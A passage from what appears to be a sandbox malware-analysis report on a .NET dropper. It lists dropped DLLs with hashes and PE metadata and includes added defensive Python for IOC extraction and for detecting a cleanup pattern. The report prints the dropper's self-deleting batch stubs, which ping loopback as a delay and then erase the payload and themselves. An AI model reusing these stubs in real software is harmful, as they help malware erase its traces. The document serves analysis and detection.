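        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Process":
            current = {}
            records.append(current)
        if current is None:
            continue
        if key == "Antivirus":
            current.setdefault("Antivirus", [])
        else:
            current[key] = value
    return records


def check_hashes(record):
    """Names of hash fields that are not hex of the expected length.  A
    truncated hash pasted into a blocklist never matches anything, so this
    is the check to run before indicators leave the analyst's desk."""
    bad = []
    for name, length in HEX_LEN.items():
        value = record.get(name, "")
        if len(value) != length or any(c not in "0123456789abcdefABCDEF" for c in value):
            bad.append(name)
    return bad


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the scale of 'Entropy (8bit)'.
    0.0 for a constant buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(entropy, threshold=ENCRYPTED_THRESHOLD):
    """Whole-file entropy near 8.0 suggests encryption or compression; the
    ~6.2 to 6.8 seen for the DLLs above is typical of ordinary native code."""
    return entropy >= threshold


def to_ioc_rows(records):
    """Normalise records into lower-case hash rows for a blocklist or SIEM."""
    return [{
        "sha256": r["SHA-256"].lower(),
        "md5": r["MD5"].lower(),
        "size": int(r["Size (bytes)"]),
        "entropy": float(r["Entropy (8bit)"]),
        "process": r["Process"],
        "av_detections": r.get("Antivirus", []),
    } for r in records]


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE_REPORT)
    for row in to_ioc_rows(recs):
        print(row["sha256"], row["size"], row["entropy"], row["av_detections"])
    # constructed buffers showing the two ends of the entropy scale
    print(shannon_entropy(b"A" * 1024), shannon_entropy(bytes(range(256)) * 4))
```

Run stand-alone it prints the two IOC rows and the entropy of a constant buffer (0.0) next to a uniform one (8.0); the report's DLLs sit in between, which is why the sandbox marks them Encrypted:false.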
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):43520
                                                                                                                  Entropy (8bit):6.446711129771228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:ja0+Mmk9lkLxI6ujB+KXuQYvY3WXux4EzIzds2a8evFJZ6i:jBlnkbud+LQ2YmXuxpzQs98y6i
                                                                                                                  MD5:83658C53D0DC9A5CF872AFB6B7C549EB
                                                                                                                  SHA1:C171283019B4C4386073A212155764D2D8A8236C
                                                                                                                  SHA-256:FCB39F9F35D7770329818094000DFA334E3D0B4EDFD851ABFB0683765166AE2C
                                                                                                                  SHA-512:F51AAC64A797C7261F7B17216A8E89594F736B624F44E5093242948AF29AE8EF87BAE46ED6FF8DE52CCFA6C8D391F3B7CEEA29E8ACE067B1632610F8D4E4A49D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.KT!..T!..T!..]Yo.P!...T..V!...S..V!...T..X!...T..^!...T..V!......W!..T!...!...T..V!...T..U!...T..U!...T..U!..RichT!..........................PE..L.....Tb...........!.....j...B......N.....................................................@.............................X.......d......................................................................@............................................text...Ah.......j.................. ..`.rdata...............n..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):133632
                                                                                                                  Entropy (8bit):6.586870045464942
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:VCGW+o7snPz7gueVUaRuW8A0+E2+WarahysvLT2Sp2+Warahesra96k:w8ngueaAqf2+WarahTLT2Sp2+WaraheU
                                                                                                                  MD5:47695AF1AB112F82C90EEA6359A45070
                                                                                                                  SHA1:9FF07A50541B72DF8106DFBB901AC20889EC99BB
                                                                                                                  SHA-256:9854825F2856A88B0CE184605431CF147B7C33AE7CF799CCBF97C4ECAB65809F
                                                                                                                  SHA-512:EEC8945A8E918F737AEBA8D4B9C1EC8EC2CDB91A4207C76BD02D7C7CDC401A04B29F4D9B0C2E2E005138E1AD18AF0826FB52B490306018A759D3434EF6EB202A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t]..................................................c.............t......t......t......t......Rich...........PE..L.....Tb...........!.....N..........N........`...............................P............@.............................d.......d............................ ... ..p{...............................{..@............`...............................text....M.......N.................. ..`.rdata...1...`...2...R..............@..@.data....i.......b..................@....rsrc...............................@..@.reloc... ... ..."..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):546816
                                                                                                                  Entropy (8bit):6.369403940782478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:m9bzx/z9ZFyZri7Oh9UuVTRak3bV/DzPbsI:sbJ/ujh1gyhLzP
                                                                                                                  MD5:64DAFFD976F2FBFB6D586249F6C15636
                                                                                                                  SHA1:420A215F757C342967A3E481B899978BB4000849
                                                                                                                  SHA-256:0D4871F762E97F34972DD824FCFDE4EE92431EA406B0C8BFDE0F42C6851D1E1C
                                                                                                                  SHA-512:19C464673726E9707588B00DB459E40D48A8913B97E6321D4509B2B7FDDF3DEF7C38D64461EF9E32418DDDB4984F0C3B1CA504636D86ED0773DE4EEBA7DDC73E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........bu...&...&...&..&..&...'...&&..'...&...'...&...'...&...'...&_..'...&...&...&H..'...&H..'...&H..'...&H..&...&H..'...&Rich...&................PE..L.....Tb...........!.....4...4.......@.......P............................................@....................................x....P.......................`...A..,...............................H...@............P..h............................text...a2.......4.................. ..`.rdata...q...P...r...8..............@..@.data...4|.......j..................@....rsrc........P......................@..@.reloc...A...`...B..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65024
                                                                                                                  Entropy (8bit):6.418545771784273
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:KzQX/CKot2BIQE9yqHnICq3ixGwBtAgUTaP/tG9xBDgYp5BZfP/I7v/X2oMFW7Hj:5ZiJQsLq0zAgU2PVG8R7HL
                                                                                                                  MD5:1A961EB78F34CC6B43800299F0534294
                                                                                                                  SHA1:57076255DC72BA0AFC2144510AF702693B0994BE
                                                                                                                  SHA-256:F57E42BFAF5438811318DF2D4342FB53B347C20DC8E66625A73745731446332B
                                                                                                                  SHA-512:245D611F208253162C71556C596A311C44FC1675C88D76BB00CB0C08E52ABD04BB0CDD14A38DECD9B2EAE4D113A7AB76C34DDEC10B34CBD7E6B83D098B4C663E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S..m..t>..t>..t>...>..t>E.u?..t>E.q?..t>E.p?..t>E.w?..t>..u?..t>\.u?..t>..u>..t>..|?..t>..t?..t>..>..t>..v?..t>Rich..t>................PE..L.....=d...........!.........^......$........................................0............@.............................`......@.......................................................................@............................................text............................... ..`.rdata..B...........................@..@.data....-.......*..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):162320
                                                                                                                  Entropy (8bit):6.65421740486783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:hEw+wyQnYUzXtwzXcVhuDMQaK/DS3L7vJ7UQvIdc0nbjYLjVtlQ7thdI8VhlIl:LKLYh7QdOLjlQ7thm
                                                                                                                  MD5:187CDD3E6152D56986BB523C3A0F7D3E
                                                                                                                  SHA1:ACA59C23E4E4974C37378BC7A2F365467E25C245
                                                                                                                  SHA-256:7F22B82BFFB4BD87C8C5DC3357C25B5714264B46CE05F6DC8C1FC4C579DCA5FD
                                                                                                                  SHA-512:C0612FB2F5D560055FFB3EC239DD4A8B06EDECE59E1C35AF2DA0E5D142643E6FC22FF4F1255CD620092D59958F758B790331163869480AA416026C374193C952
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P/h.1A;.1A;.1A;.I.;.1A;.o@:.1A;.oB:.1A;.oD:.1A;.oE:.1A;.o@:.1A;.Y@:.1A;.1@;.1A;.oI:.1A;.oA:.1A;.o.;.1A;.oC:.1A;Rich.1A;........PE..L...@.:_...........!................(...............................................Y.....@..........................*..P....+.......p...............`...............&..T...........................8'..@............................................text............................... ..`.rdata...F.......H..................@..@.data........@.......&..............@....gfids.......`.......4..............@..@.rsrc........p.......6..............@..@.reloc...............B..............@..B................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):58896
                                                                                                                  Entropy (8bit):5.838216038576758
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:PSvcU+4AjLLDRp9VpBLm6g5YuLIE4k8kF/DFz1OuIwfBSCciqy0oeDOm+FERdI8h:avf+/La5gO6dI8V0lyR
                                                                                                                  MD5:167EBEFCF1A2CB0CE7F4118FE826F58B
                                                                                                                  SHA1:5D532467D78DCC2B63848452C4F600513B4136CF
                                                                                                                  SHA-256:112C98099E5E6156A8844C6C39B2136F3146E1F2221C37B9064AB7AF6FDFABB7
                                                                                                                  SHA-512:BCD67BF4F7E5ADBD8E06A28FE3F805F79323369FBE3F37D32A513AA0336F6FFD4E1C7D978FA0480742BA1AE5D91CEB2E255E9D7033D00670E738335387F92E22
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5H..q)d.q)d.q)d..wl.p)d..wd.p)d..w..p)d..wf.p)d.Richq)d.........PE..L...,.:_...........!......................... ............................................@.........................` ..,............................................ ..T............................................................................text............................... ..`.rdata..T.... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3441168
                                                                                                                  Entropy (8bit):6.692336437440565
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:pEzrIHYnNScEE+Nt9I2RVu5121Cd6vIR57HPNMZnhPsNkTkx2s2MYu4YpZc2j:cBE7/Rag2RhHVMZ6NJF2E4aj
                                                                                                                  MD5:465089EACED8159EC533E4A37033E227
                                                                                                                  SHA1:074596ADAE6F53F33B8297F02E21F6A6F7AC6FF1
                                                                                                                  SHA-256:2B29AE140CB9F08AF872ACF9E17F785EF99398EF3367549B55242BC064D6AE40
                                                                                                                  SHA-512:55ECA0922074162C22FFF2B4F97BD2972540FA893B9B02B7D9BFA26345186DBBDAF1FBC37A9EBA6366743D0D42FB5BB88E708877DFD57CB02CA4D3A6953CFB81
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........->..LP.LP.LP.4..LP..Q.LP.4..LP..S.LP..U.LP..T.LP..$Q.LP.LQ..MP...X.jLP...P.LP.....LP...R.LP.Rich.LP.........PE..L...".:_...........!.........D......-........................................P6.......4...@...........................+......,.|....`4..............h4......p4.X.....+.T...........................(.+.@............................................text............................... ..`.rdata..<...........................@..@.data...`s....,.......,.............@....gfids.......P4.......2.............@..@.rsrc........`4.......2.............@..@.reloc..X....p4.......2.............@..B................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23568
                                                                                                                  Entropy (8bit):6.3163367160293795
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:CP0MtNXsSBoYssphKfkOgJYgTiwO5xOJ9qsTdI8qG5inYPLxDG4y827DM:i0ot6YsckkrOgnOmJ9qsTdI8qGcWDG4J
                                                                                                                  MD5:D3BF89184B94A4120F4F19F5BCD128D6
                                                                                                                  SHA1:C7F22BB0B957BD7103CF32F8958CFD2145EAA5B8
                                                                                                                  SHA-256:568EFDC33F1FCC1AF1D030C75FCCEDC2D9B1FCBF49C239726E2CF49D47ADD902
                                                                                                                  SHA-512:1DA8EBF323D170C5E9F6BFBB738E60119CCC690A08234DD23F2D9C1A33519FD4AD154805B012CCA3DC7565BEE672D334CA877AFE2B5211E2122DD6E1CE337971
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...Fb..Fb..Fb..>...Fb...c..Fb...a..Fb...g..Fb...f..Fb.+.c..Fb...c..Fb..Fc..Fb.+.j..Fb.+.b..Fb.+....Fb.+.`..Fb.Rich.Fb.........PE..L...>.:_...........!.........*......2........0......................................NL....@..........................5..L....5..x....`...............B.......p..t....1..T...........................(2..@............0...............................text............................... ..`.rdata..8....0......................@..@.data...p....@.......*..............@....gfids.......P.......0..............@..@.rsrc........`.......2..............@..@.reloc..t....p.......>..............@..B................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):914584
                                                                                                                  Entropy (8bit):6.825568092802891
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:zadFmfYOLU7712zo2TeW04aoVmcvIZPoy4HHJ:udFlHuSPaHJ
                                                                                                                  MD5:A924B24D71829DA17E8908E05A5321E4
                                                                                                                  SHA1:FA5C69798B997C34C87A8B32130F664CDEF8C124
                                                                                                                  SHA-256:F32A61D91264AFF96EFD719915BED80785A8DB4C8D881D6DA28909B620FE466F
                                                                                                                  SHA-512:9223EC0E6E0F70B92473E897E4FD4635A19E9CA3AFF2FE7C5C065764B58E86460442991787525ED53E425ECD36F2881A6DF34C35D2A0E21B7AC4BC61BF1CBEAB
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`.M.............yf.........Z...........\.......\.......\.......\.......\.......\.......\......Rich............PE..L...Y..\...........!.....,..........P........@.......................................e....@A.........................^.......b.......... ................@.......Y..p...8...........................H...@............`...............................text....+.......,.................. ..`.data...$....@.......0..............@....idata..j....`.......>..............@..@.rsrc... ............T..............@..@.reloc...Y.......Z...Z..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1063440
                                                                                                                  Entropy (8bit):5.335145703200824
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:q3eYbeoEYa6l0SYx7tHcQJPREI+V/IF+7agsSJNzkRoEVCTRPmrZ6wBj:q3eBN6axxcCr+VU+7agnNcITRopp
                                                                                                                  MD5:22EE48112415EE74C80B66CC1A8E1CA8
                                                                                                                  SHA1:9EB11B06BA0EA22A2F339D0CE300F45F48607D4C
                                                                                                                  SHA-256:8F38B8891C74DA4AF150B60D21053CDA95A61881C61B8FFF1C8852885DE8B2AF
                                                                                                                  SHA-512:080DA19FCBFCFDD55BCCF231F6F4820204707AE3A08DE7E40CE8E1F87DF1EDD916FD55A37E6560C1E1A6935DDC42D47DCE82AA834A8287B024D907CC9B98B3CE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,F..B...B...B......B..C...B..A...B..G...B..F...B.u.C...B...C...B...C...B.u.J...B.u.B...B.u.....B.u.@...B.Rich..B.........PE..L...?.:_...........!.....4...........4.......P...............................`......V.....@..........................Q..X...HR.......@............... .......P.......N..T...........................XN..@............P...............................text...N2.......4.................. ..`.rdata.......P.......8..............@..@.data...(....`.......B..............@....gfids.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):5.014649811151128
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:2EKDD67Ot+WfW2AHWea/u2LWmTWMD2Ut+WfW2AHWea/u2LWmT8KReGvxn:0WKwv2sLsWmSMD2Uwv2sLsWmYCn
                                                                                                                  MD5:1AE7F173FD900FCB8EE7B29A58316E15
                                                                                                                  SHA1:E67B53EDD5110009732CCF2156ECD4C7E595B217
                                                                                                                  SHA-256:F3DA303EFA30F74A05272DF86AB6D3738254D209D30053B65C44458021551D6F
                                                                                                                  SHA-512:BEBBD24DB0FC6F19A56F4EEAE9AA65F637D8313F074EF6D841EEF644DEA9C12B3E63128E9BAEFDAD2CD75D217AA744660C7D131F0EE61FB7F88F2C9D9069D336
                                                                                                                  Malicious:false
                                                                                                                  Preview:..@echo off..:loop..del "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"..if exist "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe" goto loop..del %0
                                                                                                                  Process:C:\ProgramData\Microsoft\Bound.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):137
                                                                                                                  Entropy (8bit):5.1375617365277355
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDGMLCuXSLVLxxFkhgXZkRErG+fnF4AHyBkZOt+kiE2J5xAIynQKnn:hSKDXSLpnWhgGaPFNSKowkn23f0QAn
                                                                                                                  MD5:269B1F8841C103F21CAC92ECF4CEF45D
                                                                                                                  SHA1:A28E9DDE2274C5FF1D19042BA7F1936DA4318C43
                                                                                                                  SHA-256:31AACE1B9CC2166D932388AA02E542943AEE7CFA5420925F4AC5F3E1FF8BA8BD
                                                                                                                  SHA-512:11E558DFAF0DDE09711AF52390D48A19DD69585F573A521CD030712299F59B3884315787B45B38BCCE22D3D8BA1F7F5CC2842F969D25DC2FF4F9DBAF6E55DE69
                                                                                                                  Malicious:false
                                                                                                                  Preview:@echo off..ping 127.0.0.1 -n 2 > nul..del "C:\ProgramData\Microsoft\Bound.exe"..del "C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat"..
Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.465741954895257
Encrypted:false
SSDEEP:6144:gIXfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbJ:lXD94wWlLZMM6YFHD+J
MD5:E8EA90961201254D9210C5FF57368940
SHA1:01C4C194F26702097D9CC3825EACA80F3FF81A8F
SHA-256:AECA86CCEEC823C2BAF9B8AA1373940CB0E878E5C393AB028A20219549B2812A
SHA-512:6FD5C6DFA512BFBFD85C73F1CC16440E22BCB217A4F4A6FA57F98C734987238C8C9F8A6F3952EE57617D2DFA4BCD8786D4570D3351D135C0453EA810216BB2D6
Malicious:false
Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"?.o.*..............................................................................................................................................................................................................................................................................................................................................:..[........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\PING.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):331
Entropy (8bit):4.92149009030101
Encrypted:false
SSDEEP:6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
MD5:2E512EE24AAB186D09E9A1F9B72A0569
SHA1:C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
SHA-256:DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
SHA-512:6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
Malicious:false
Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
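The dropped tmp8B5F.tmp.bat above is the classic "ping loopback as a sleep, then delete the payload and yourself" cleanup stub, and the PING.EXE output file is the trace it leaves behind. The following detection logic is an added example for this report, not Joe Sandbox code: it parses a batch file (or a `cmd /c a & b` command line from process-creation telemetry) and flags a loopback ping whose only purpose is a delay when it is followed by deletions. MALICIOUS_BAT is the batch content from the Preview field with its ".." CRLF markers expanded; BENIGN_BAT and the command line in the test are constructed for contrast.

```python
"""Flag the "ping-as-sleep, then delete" cleanup pattern in batch files and
one-line cmd invocations.  Added example for this report, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Content of the dropped batch file, as shown in the report's Preview field.
MALICIOUS_BAT = (
    "@echo off\r\n"
    "ping 127.0.0.1 -n 2 > nul\r\n"
    'del "C:\\ProgramData\\Microsoft\\Bound.exe"\r\n'
    'del "C:\\Users\\user\\AppData\\Local\\Temp\\tmp8B5F.tmp.bat"\r\n'
)
# Constructed benign script: a real reachability check, nothing deleted.
BENIGN_BAT = "@echo off\r\nping 10.0.0.1 -n 4\r\necho done\r\n"

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
PING_RE = re.compile(r"^\s*ping(?:\.exe)?\s+(.*)$", re.IGNORECASE)
DEL_RE = re.compile(r'^\s*(?:del|erase)\s+(?:/\w\s+)*"?([^"]+?)"?\s*$', re.IGNORECASE)


@dataclass
class Finding:
    sleep_seconds: Optional[int] = None   # delay implied by loopback ping -n COUNT
    deleted: List[str] = field(default_factory=list)
    deletes_executable: bool = False
    deletes_script: bool = False          # a .bat/.cmd is removed: self-deletion

    @property
    def ping_sleep_cleanup(self) -> bool:
        return self.sleep_seconds is not None and bool(self.deleted)


def ping_sleep_seconds(args: str) -> Optional[int]:
    """Delay a `ping` line stands for, or None when it targets a real host.
    ping waits about one second between echo requests, so `-n N` against
    loopback burns roughly N-1 seconds; nothing can be learned from the reply."""
    tokens = args.split()
    if not any(t.lower() in LOOPBACK for t in tokens):
        return None
    count = 1
    for i, t in enumerate(tokens):
        if t.lower() == "-n" and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            count = int(tokens[i + 1])
    return max(count - 1, 0)


def analyze_batch(script: str) -> Finding:
    """Walk the script line by line, summing loopback-ping delays and collecting
    the paths it deletes."""
    f = Finding()
    for line in script.splitlines():
        m = PING_RE.match(line)
        if m:
            delay = ping_sleep_seconds(m.group(1))
            if delay is not None:
                f.sleep_seconds = (f.sleep_seconds or 0) + delay
            continue
        m = DEL_RE.match(line)
        if m:
            path = m.group(1)
            f.deleted.append(path)
            low = path.lower()
            f.deletes_executable |= low.endswith((".exe", ".dll", ".scr"))
            f.deletes_script |= low.endswith((".bat", ".cmd"))
    return f


def analyze_command_line(cmdline: str) -> Finding:
    """Same check on the one-line `cmd /c a & b` form seen in process-creation
    logs (Sysmon event 1, Security 4688): strip the cmd prefix, split on '&'."""
    body = re.sub(r'^\s*"?(?:[\w:\\]*cmd(?:\.exe)?)"?\s+/[cCkK]\s+', "", cmdline)
    return analyze_batch("\n".join(re.split(r"&&?", body)))


if __name__ == "__main__":
    for label, text in (("dropped bat", MALICIOUS_BAT), ("benign", BENIGN_BAT)):
        print(label, analyze_batch(text))
```

The loopback target plus `> nul` is what separates a sleep from a connectivity check; a ping to a routable address with visible output is left alone, which keeps the rule quiet on administrative scripts.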
File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.9999823397845145
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
File size:42'137'088 bytes
MD5:a9a01bcaf4ffeddb26fd9fc79f0b57c4
SHA1:becb33e475352ad604ea851038cec53d2d15b047
SHA256:64be2f3a38522ca4b5f4d7887cd5832363f00d1a07b8bb531424bf6e81939fce
SHA512:8ade168a430cbcd0375ff6f3a1d774b882d4bc55a03a1dc12839af2d7579dd1a8502e80e7f8a9aeac63321826299076536dfd03a0b2eca7210663235622a3dc9
SSDEEP:786432:JmVqrMvDDbtNol33m04zcGnI2bAYs0MNYRNFF8SMEJUG/wwOc4:MVqovbtNol3zC1Nr8S5l/qc
TLSH:02973318D63A1C9FDE668D25480DBD73B599B631A35F0543E4C28BB6232CC899A0D4FF
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,..........."...0......f.......`....... ....@.. ....................................`................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x2c3600a
Entrypoint Section:(nameless; RVA 0x283600a lies in the unnamed 0x10-byte section at 0x2836000, which is why no name is shown)
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0xCF2C0F01 [Wed Feb 21 19:58:57 2080 UTC] (a date in the future, so not a genuine build time; this is the "suspicious time stamp" signature)
TLS Callbacks:
CLR (.Net) Version:v4.0.30319
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [02C36000h]
add byte ptr [eax], al   (repeated 97 times: everything after the 6-byte jmp is zero padding, and the byte pair 00 00 disassembles as add byte ptr [eax], al)

This is the standard native entry stub of a managed executable: the jmp goes through the IAT slot at 0x02C36000 (Imagebase 0x400000 + IAT RVA 0x2836000), which holds the address of mscoree!_CorExeMain, the binary's only import. The 8-byte IAT and the stub at offset 0xa together fill the nameless 0x10-byte section.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x28287f8        0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2832000        0x538         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
